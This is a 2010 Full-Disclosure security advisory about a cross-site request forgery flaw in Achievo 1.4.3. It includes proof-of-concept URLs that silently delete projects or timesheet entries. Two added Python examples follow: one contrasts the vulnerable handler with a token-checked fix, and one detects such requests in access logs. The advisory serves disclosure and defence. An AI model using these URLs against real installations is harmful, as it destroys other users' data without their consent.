List: full-disclosure
Subject: [Full-disclosure] CYBSEC Advisory 2010 0902 Achievo 1.4.3 (CSRF)
From: "CYBSEC Labs" <cybseclabs () cybsec ! com>
Date: 2010-09-28 14:59:23
Message-ID: 1E50EAE1F4C34732B3A8DF869D24F078 () adcybsec ! com
Advisory Name: Cross Site Request Forgery in Achievo 1.4.3
Internal Cybsec Advisory Id: 2010-08-03
Vulnerability Class: Cross Site Request Forgery
Release Date: 2010-Sept-28
Affected Applications: Achievo 1.4.3 (other versions may be also vulnerable)
Affected Platforms: Any
Local / Remote: Remote
Severity: Medium CVSS#2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Researcher: Pablo G. Milano
Vendor Status: Confirmed / Patch is available
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability Description:
Because the application does not properly validate the "confirm" parameter in the URL, a logged-in Achievo user may be tricked into visiting a URL that deletes tasks or projects without the user's confirmation.
Proof of Concept:
1) To delete a project:
http://server/dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes
(where XXXX is the project ID number)
2) To delete an activity:
http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes
(where "XXXX" is the actual ID of the activity to be deleted)
Note: Even though a confirmation message is displayed to the user, at that point the activity has already been deleted.
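The flaw is that a "confirm=Yes" query-string parameter is treated as proof that the user confirmed the deletion, so a single GET request (the kind a third-party page can trigger silently) performs the destructive action. The following Python example is added here to illustrate the pattern and its fix; it is not Achievo's or CYBSEC's code. It models the request handling in plain functions (no web framework), uses the advisory's PoC URL shape with a constructed project ID, and contrasts the vulnerable handler with one that renders a confirmation form on GET and deletes only on a POST carrying a per-session CSRF token; the token scheme and the `Request` model are assumptions of the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the advisory's PoC URL, with a made-up project ID.
POC_URL = ("http://server/dispatch.php?atknodetype=project.project"
           "&atkselector=project.id='1234'&atkaction=delete"
           "&atklevel=1&atkprevlevel=0&confirm=Yes")


@dataclass
class Request:
    """Minimal model of an HTTP request: method, full URL, POST body, session."""
    method: str
    url: str
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)

    @property
    def query(self) -> dict:
        # First value of each query-string parameter, as a web framework would expose it.
        return {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}


def vulnerable_dispatch(req: Request, store: set) -> str:
    """Flawed pattern from the advisory: 'confirm=Yes' in the query string is
    trusted, so a plain GET (e.g. an <img src=...> on a third-party page)
    deletes the record before the user ever sees a confirmation dialog."""
    q = req.query
    if q.get("atkaction") != "delete":
        return "noop"
    if q.get("confirm") == "Yes":
        store.discard(q.get("atkselector"))
        return "deleted"
    return "confirmation page shown"


def issue_csrf_token(session: dict) -> str:
    """Per-session synchronizer token; the confirmation form embeds it as a hidden field."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def hardened_dispatch(req: Request, store: set) -> str:
    """Hardened handler: GET can only render the confirmation form; the delete
    happens only on a POST whose body carries both the confirmation and a token
    matching the one stored in the user's session (not anything from the URL)."""
    q = req.query
    if q.get("atkaction") != "delete":
        return "noop"
    if req.method != "POST":
        return "confirmation page shown"
    expected = req.session.get("csrf_token", "")
    supplied = req.form.get("csrf_token", "")
    # Constant-time comparison; an absent session token always fails.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: bad or missing CSRF token"
    if req.form.get("confirm") != "Yes":
        return "rejected: not confirmed"
    store.discard(q.get("atkselector"))
    return "deleted"


if __name__ == "__main__":
    projects = {"project.id='1234'"}
    print(vulnerable_dispatch(Request("GET", POC_URL), projects), projects)   # deleted, set()
    projects = {"project.id='1234'"}
    print(hardened_dispatch(Request("GET", POC_URL), projects), projects)     # confirmation page shown
    sess = {}
    tok = issue_csrf_token(sess)
    print(hardened_dispatch(Request("POST", POC_URL, {"confirm": "Yes", "csrf_token": tok}, sess), projects), projects)
```

The two properties that close the hole are independent: destructive actions are bound to POST so that a URL alone cannot trigger them, and the POST must carry a secret the attacker's page cannot read. Either one alone is weaker: a POST without a token can still be auto-submitted by a cross-site form, and a token checked on GET still leaks into Referer headers and browser history.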
Solution: Upgrade to version 1.4.5
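Until the upgrade is applied, the request shape shown in the proof of concept (a GET to dispatch.php carrying both atkaction=delete and confirm=Yes) is easy to hunt for in web server access logs. The following Python example is an added detection script, not part of the advisory or of Achievo; it parses combined-format log lines, flags matching GET requests, and reports whether the Referer is missing or points at a foreign host. The log lines, the /achievo/ path prefix, the hostnames, IP addresses, user names and record IDs are all constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample traffic (not real logs). Lines 3 and 4 follow the advisory's
# PoC URL shapes; line 2 is the same delete action without confirm=Yes.
SAMPLE_LOG = """\
10.0.0.5 - jdoe [28/Sep/2010:15:01:02 +0000] "POST /achievo/dispatch.php HTTP/1.1" 200 512 "http://achievo.example.internal/achievo/dispatch.php" "Mozilla/5.0"
10.0.0.5 - jdoe [28/Sep/2010:15:01:40 +0000] "GET /achievo/dispatch.php?atknodetype=project.project&atkselector=project.id='42'&atkaction=delete&atklevel=1&atkprevlevel=0 HTTP/1.1" 200 1843 "http://achievo.example.internal/achievo/dispatch.php" "Mozilla/5.0"
10.0.0.5 - jdoe [28/Sep/2010:15:02:11 +0000] "GET /achievo/dispatch.php?atknodetype=project.project&atkselector=project.id='42'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes HTTP/1.1" 200 1843 "http://lure.example.net/page.html" "Mozilla/5.0"
10.0.0.9 - asmith [28/Sep/2010:15:03:27 +0000] "GET /achievo/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='77'&confirm=Yes HTTP/1.1" 200 1702 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(path: str) -> dict:
    return {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}


def is_confirmed_get_delete(entry: dict) -> bool:
    """GET to dispatch.php carrying atkaction=delete and confirm=Yes: the exact
    shape from the advisory, which the vulnerable version executes immediately."""
    if entry["method"] != "GET" or not urlsplit(entry["path"]).path.endswith("/dispatch.php"):
        return False
    q = query_params(entry["path"])
    return q.get("atkaction") == "delete" and q.get("confirm") == "Yes"


def referer_is_foreign(entry: dict, own_host: str) -> bool:
    """True when the Referer is absent or names another host, i.e. the request
    was not reached by navigating within the application itself."""
    ref = entry["referer"]
    if ref in ("", "-"):
        return True
    return urlsplit(ref).hostname != own_host


def find_forged_deletes(log_text: str, own_host: str) -> list:
    """Collect every confirmed GET delete with user, target record and Referer
    verdict; a foreign or missing Referer is the strongest CSRF indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry or not is_confirmed_get_delete(entry):
            continue
        hits.append({
            "user": entry["user"],
            "ip": entry["ip"],
            "selector": query_params(entry["path"]).get("atkselector"),
            "referer": entry["referer"],
            "foreign_referer": referer_is_foreign(entry, own_host),
        })
    return hits


if __name__ == "__main__":
    for hit in find_forged_deletes(SAMPLE_LOG, "achievo.example.internal"):
        print(hit)
```

The Referer split matters because, in the vulnerable version, a user who genuinely confirms a deletion may also produce a GET carrying confirm=Yes; the advisory does not describe that flow, so the script reports every such request and lets the Referer distinguish in-application navigation from requests arriving from elsewhere. Referer can be stripped by browsers or privacy tools, so a missing value is treated as suspicious rather than benign.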
Vendor Response:
2010-Aug-04: Vendor is contacted
2010-Aug-05: Vulnerabilities details are sent to vendor
2010-Aug-25: Vendor informs status
2010-Sept-27: Vendor and researcher agree publication date
2010-Sept-28: Vulnerability public disclosure / Patch is released
Contact Information:
For more information regarding the vulnerability feel free to contact the researcher at
pmilano <at> cybsec <dot> com
About CYBSEC S.A. Security Systems
Since 1996, CYBSEC has been engaged exclusively in rendering professional services specialized in Information Security. Its service area covers Latin America and Spain, and over 250 customers are proof of its professional record.
To remain objective, CYBSEC S.A. does not represent, sell, or associate with other software and/or hardware vendors.
Our services are strictly focused on Information Security, protecting our clients from emerging security threats and keeping their IT deployments available, safe, and reliable.
Beyond professional services, CYBSEC continuously researches new defense and attack techniques and contributes to the security community through high-quality information exchange.
For more information, please visit www.cybsec.com
(c) 2010 - CYBSEC S.A. Security Systems
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/